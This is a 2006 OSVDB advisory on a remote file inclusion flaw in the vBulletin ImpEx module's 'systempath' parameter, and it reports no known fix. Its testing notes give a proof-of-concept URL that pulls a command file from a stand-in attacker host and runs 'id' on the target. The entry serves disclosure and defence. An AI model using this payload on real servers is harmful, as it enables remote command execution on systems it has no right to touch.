vBulletin ImpEx Module ImpExModule.php systempath Variable Remote File Inclusion

2006-04-12T19:59:18
ID OSVDB:24690
Type osvdb
Reporter Dr.Jr7(dr.jr7@hotmail.com)
Modified 2006-04-12T19:59:18

Description

Vulnerability Description

vBulletin ImpEx Module contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to ImpExModule.php not properly sanitizing user input supplied to the 'systempath' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Short Description

vBulletin ImpEx Module contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to ImpExModule.php not properly sanitizing user input supplied to the 'systempath' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Manual Testing Notes

http://[target]/forum/impex/ImpExModule.php?systempath=http://[attacker]/cmd?&=id

References:

Vendor URL: http://www.vbulletin.com/docs/html/impex Secunia Advisory ID:19352 Related OSVDB ID: 24070 Related OSVDB ID: 24692 Related OSVDB ID: 24691 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-04/0247.html CVE-2006-1816